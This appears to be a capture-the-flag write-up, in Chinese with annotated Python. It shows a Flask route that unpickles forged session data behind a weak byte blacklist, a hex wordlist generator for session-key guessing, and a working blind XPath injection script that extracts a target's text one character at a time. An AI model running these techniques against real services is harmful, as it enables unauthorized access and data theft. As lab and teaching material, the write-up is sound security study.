@app.route('/admin')
def admin():
    """Admin endpoint: gate on session['user'], then unpickle session['ser_data'].

    Returns "ok" when the unpickle succeeds, "error!" when any exception is
    raised, and an inline-script redirect when the session user is not "admin".
    """
    # NOTE(review): the authorization decision rests entirely on a value read
    # back from the session. If this is Flask's default client-side signed
    # cookie session, the check is only as strong as the app's secret key —
    # confirm how that key is configured.
    if session.get('user') != "admin":
        return f"<script>alert('Access Denied');window.location.href='/'</script>"
    else:
        try:
            # `a` is a filtered COPY of the decoded payload. The replacements
            # exempt the substrings "builtin", "os" and "bytes" from the
            # single-byte blacklist below (presumably aimed at the R/i/o/b
            # pickle opcodes REDUCE/INST/OBJ/BUILD). A byte-level blacklist is
            # not a security boundary for pickle.
            a = base64.b64decode(session.get('ser_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes")
            if b'R' in a or b'i' in a or b'o' in a or b'b' in a:
                raise pickle.UnpicklingError("R i o b is forbidden")
            # SECURITY: pickle.loads on data that arrives via the session is
            # arbitrary code execution for whoever can author that session.
            # Note that the raw re-decoded bytes are loaded here, not the
            # filtered `a`. The fix is to not unpickle untrusted data at all
            # (a data-only format such as JSON), or at minimum a
            # pickle.Unpickler subclass whose find_class rejects everything
            # not explicitly allowed. The unpickled object is discarded; the
            # route only reports success or failure.
            pickle.loads(base64.b64decode(session.get('ser_data')))
            return "ok"
        except:
            # Bare except: also swallows the UnpicklingError raised above,
            # collapsing every failure into the same "error!" response.
            return "error!"
if __name__ == '__main__':
    # Development server bound to every interface (0.0.0.0), as the original
    # does; this exposes the app beyond localhost, so anything but a lab
    # deployment belongs behind a real WSGI server / reverse proxy.
    bind_host = '0.0.0.0'
    bind_port = 8888
    app.run(host=bind_host, port=bind_port)
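import itertools

# Emit every 4-character lowercase-hex string (65536 lines), printing each one
# and appending it to ./1.txt. The original nested four loops and shadowed the
# builtin `str`; itertools.product yields the same strings in the same order.
hexs = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
# NOTE: "a" appends, so re-running the script duplicates the file's content.
with open("./1.txt", "a") as f:
    for combo in itertools.product(hexs, repeat=4):
        line = "{}{}{}{}\n".format(*combo)
        print(line)
        f.write(line)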
接着就是要绕过反序列化执行命令了
# Excerpt of the /admin handler quoted in this writeup.
# `a` is a filtered copy: the replacements exempt "builtin"/"os"/"bytes" from
# the single-byte R/i/o/b check, and pickle.loads is then called on the raw
# re-decoded session bytes rather than on `a`. Unpickling session-supplied
# data is unsafe regardless of this filter; a data-only format or a
# find_class-restricted Unpickler is the mitigation.
a = base64.b64decode(session.get('ser_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes")
if b'R' in a or b'i' in a or b'o' in a or b'b' in a:
    raise pickle.UnpicklingError("R i o b is forbidden")
pickle.loads(base64.b64decode(session.get('ser_data')))
这个ser_data是从session里取的,所以我们要伪造session传入pickle反序列化的数据,同时它也限制了R i o b四个操作符
# Blind XPath injection oracle against the /hello endpoint: one character of
# the targeted text node is tested per request, and a true comparison is
# detected by "<p>user1</p>" appearing in the response body.
# Defender notes: the server is evidently concatenating the `xpath` form
# field into a query, so the single quote in the payload terminates the
# literal — the fix is to never build XPath from user input (bind variables
# or whitelist the expected values). A burst of sequential POSTs whose
# `xpath` field contains substring(..., N, 1) with incrementing N is a
# characteristic signature for detection.
url = "http://eci-2zeetzz54w4b5tinoysb.cloudeci1.ichunqiu.com:8888/hello"
# Candidate alphabet; "{-}" first so flag-style delimiters are tried early.
strs = "{-}" + string.ascii_letters + string.digits
result = ""
end = False
for a in range(1,100):
    # `end` is set only when a whole pass over `strs` matched nothing at the
    # previous position, i.e. the string has been fully recovered.
    if end:
        print("[+]Done!: {}".format(result))
        break
    for i in strs:
        print("[+]Test:{} {}".format(a,i))
        # data = {"xpath" : "1'or substring(name(/*[1]), {}, 1)='{}' and '1'='1".format(a,i)}
        # data = {"xpath" : "1'or substring(name(/root/*[1]), {}, 1)='{}' and '1'='1".format(a,i)}
        # data = {"xpath" : "1'or substring(name(/root/user/*[2]), {}, 1)='{}' and '1'='1".format(a,i)}
        data = {"xpath" : "1'or substring(/root/user/username[position()=2]/text(), {}, 1)='{}' and '1'='1".format(a,i)}
        # `res` is presumably the requests module imported under that name — verify.
        resp = res.post(url=url, data=data)
        # print(resp.text)
        if resp.text.find("<p>user1</p>") != -1:
            result += i
            print("[+]Matched: " + result)
            break
        # Reached only when the last candidate did not match: nothing at this
        # position, so stop on the next outer iteration. (Note the 1-char
        # slice comparison; strs[-1] would read more directly.)
        if i == strs[len(strs)-1:]:
            end = True